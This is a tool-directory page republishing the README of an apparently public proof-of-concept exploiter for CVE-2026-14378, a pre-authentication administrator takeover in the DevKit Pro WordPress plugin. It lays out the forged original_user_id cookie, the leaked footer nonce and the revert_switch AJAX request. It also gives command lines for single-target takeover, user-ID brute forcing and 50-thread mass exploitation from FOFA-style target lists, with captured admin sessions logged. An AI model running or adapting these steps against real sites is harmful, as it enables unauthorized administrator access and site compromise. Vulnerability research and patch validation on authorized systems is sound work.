Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-14378 — Python PoC scanner and exploit helper for CVE-2026-14378, an unauthenticated admin session takeover in the DevKit Pro WordPress plugin via forged original_user_id cookie. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-14378
Defensive ToolsReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration TestingAuthentication
GitHub
1 day agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
murrez/cve-2026-14378

CVE-2026-14378

Python PoC scanner and exploit helper for CVE-2026-14378, an unauthenticated admin session takeover in the DevKit Pro WordPress plugin via forged original_user_id cookie.

View Repository
Share

CVE-2026-14378 — DevKit Pro authentication bypass PoC

Proof-of-concept scanner and exploit helper for CVE-2026-14378: unauthenticated administrator session takeover in the WordPress plugin DevKit Pro (dplugins) through a flawed user-switch “revert” flow.

Legal: Use only on systems you own or have explicit written permission to test. Unauthorized access is illegal. This repository is for defensive research, verification, and patching validation.


GitHub repository description (copy-paste)

PoC for CVE-2026-14378: DevKit Pro ≤2.3.0 pre-auth admin takeover via forged original_user_id cookie + wp_footer revert_switch nonce. check/admin + mass scan.

Suggested topics: cve-2026-14378, wordpress, wordpress-exploit, devkit-pro, dplugins, authentication-bypass, poc, security-research


Vulnerability at a glance

CVECVE-2026-14378
ProductDevKit Pro (vendor: dplugins)
TypeAuthentication bypass → full administrator session (CWE-287)
AffectedAll versions ≤ 2.3.0
Fixed3.0.0+ (changelog)
CVSS 3.19.8 Critical — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence

Related advisory (same product, different bug)

CVEIssueAuth
CVE-2026-14357Arbitrary theme ZIP install via DPDEV_install_themesSubscriber+
CVE-2026-14378Session takeover via user-switch revertNone

This PoC targets 14378 only.


Root cause (technical)

DevKit Pro’s Users Manager can impersonate users for testing. When an admin switches to another account, the plugin stores the prior identity in a client cookie:

  • original_user_id — user ID of the account before the switch

When that cookie is present, the plugin renders a “switch back” control in wp_footer on the front end, including a WordPress nonce bound to the revert action.

The revert_switch handler (AJAX) calls verify_nonce_and_capability(), which incorrectly evaluates manage_options against the user referenced by original_user_id, instead of using current_user_can() on the actual requester (who may be completely unauthenticated).

An attacker can:

  1. Set Cookie: original_user_id=<administrator_user_id> (commonly 1).
  2. Request any public page and parse the footer for the revert form / nonce.
  3. POST to wp-admin/admin-ajax.php with action=revert_switch (or plugin-specific alias) and the leaked nonce.
  4. Trigger wp_set_auth_cookie() for the forged user ID → authenticated administrator session.

Official feature context: Users Manager — switch back.


Attack flow

sequenceDiagram
    participant A as Attacker
    participant W as WordPress (front end)
    participant P as DevKit Pro
    participant X as admin-ajax.php

    A->>W: GET / (Cookie: original_user_id=1)
    W->>P: wp_footer hook
    P-->>W: switch-back HTML + nonce
    W-->>A: page body contains nonce
    A->>X: POST action=revert_switch + nonce
    Note over P,X: capability checked for user 1, not attacker
    X-->>A: Set-Cookie wordpress_logged_in_*
    A->>W: GET /wp-admin/
    W-->>A: admin dashboard

When the check succeeds vs fails

The check command is intentionally strict: it reports vulnerable only if a switch-back nonce appears after forging original_user_id.

ObservationLikely meaning
VULNERABLE — switch-back material leakedExploit path likely works; confirm in a lab before admin.
not vulnerable (check): no switch-back nonce…Patched DevKit (≥ 3.0.0), plugin not installed, Users Manager disabled (off by default), custom plugin path, cache/CDN stripping footer, or wrong site.
DevKit Pro readme not confirmedNo public readme.txt fingerprint; plugin may still be present but hidden — oracle remains the decisive test.
DevKit Pro <= 2.3.0 suspected + still no nonceVulnerable version may be installed but switch feature not enabled or footer not rendered on tested URLs.

Note: A HTTP 200 on /wp-content/plugins/.../readme.txt that returns a full HTML page is a common WordPress soft 404. This PoC validates readme content (Plugin Name: header), not status code alone.


Requirements

  • Python 3.9+
  • requests
pip install requests

Optional: requirements.txt contains a pinned minimum:

requests>=2.28.0

Installation

git clone https://github.com/YOUR_USER/cve-2026-14378-poc.git
cd cve-2026-14378-poc
pip install -r requirements.txt   # or: pip install requests

Usage

Single target — detection only (safe)

Does not complete takeover; only tests the footer nonce oracle.

python poc.py check https://target.example/
python poc.py check https://target.example/ --user-id 2
python poc.py check https://target.example/ --timeout 40

Single target — session takeover

Attempts full revert_switch and verifies /wp-admin/ access.

python poc.py admin https://target.example/
python poc.py admin https://target.example/ --user-id 1 --brute 5
python poc.py admin https://target.example/ --log successes.txt
FlagDescription
--user-idAdministrator (or target) user ID forged in original_user_id (default: 1)
--bruteTry IDs 1..N when the first ID fails
--timeoutHTTP timeout in seconds (default: 25)
--logAppend successful admin URLs to a file (default: logs.txt)

Mass scan (list file)

One URL per line; # comments and extra columns after whitespace are ignored.

# Detection only (recommended first pass)
python poc.py targets.txt

# Exploit attempts (authorized targets only)
python poc.py targets.txt admin

If no file is passed as the first argument, the script prompts for a list path (same behavior as legacy mass scanners).

Mass mode uses a thread pool (50 workers). Tune in poc.py if you hit rate limits.

Example list file

# FOFA / manual imports
https://staging.example.com
example.org
192.0.2.10|wordpress|1.2.3   # only first token is used

Example output

Vulnerable (check):

[*] https://vulnerable.example
[+] DevKit Pro <= 2.3.0 suspected (stable tag 2.3.0)
[+] VULNERABLE — switch-back material leaked (action=revert_switch, nonce=a1b2c3d4…)

Not vulnerable (typical mass scan):

[*] https://patched.example
[!] DevKit Pro readme not confirmed (hidden path, WAF, or plugin absent)
[-] not vulnerable (check): no switch-back nonce in wp_footer with forged original_user_id cookie — patched DevKit, Users Manager off, or wrong target

Successful admin:

[*] https://lab.local
[+] https://lab.local -> administrator session as user_id=1
[+] cookie: wordpress_logged_in_…=…

Implementation notes

  • HTTP: TLS verification disabled (verify=False) for pentest-style scanning; redirects followed; optional HTTP↔HTTPS fallback on errors.
  • AJAX actions tried: revert_switch, DPDEV_revert_switch, dpdev_revert_switch, devkit_revert_switch (commercial plugin; exact hook name may vary by build).
  • Oracle pages: /, /?p=1, /sample-page/, /index.php with forged cookie.
  • Success signals: wordpress_logged_in_* cookie and/or /wp-admin/ dashboard markers.
Download Tool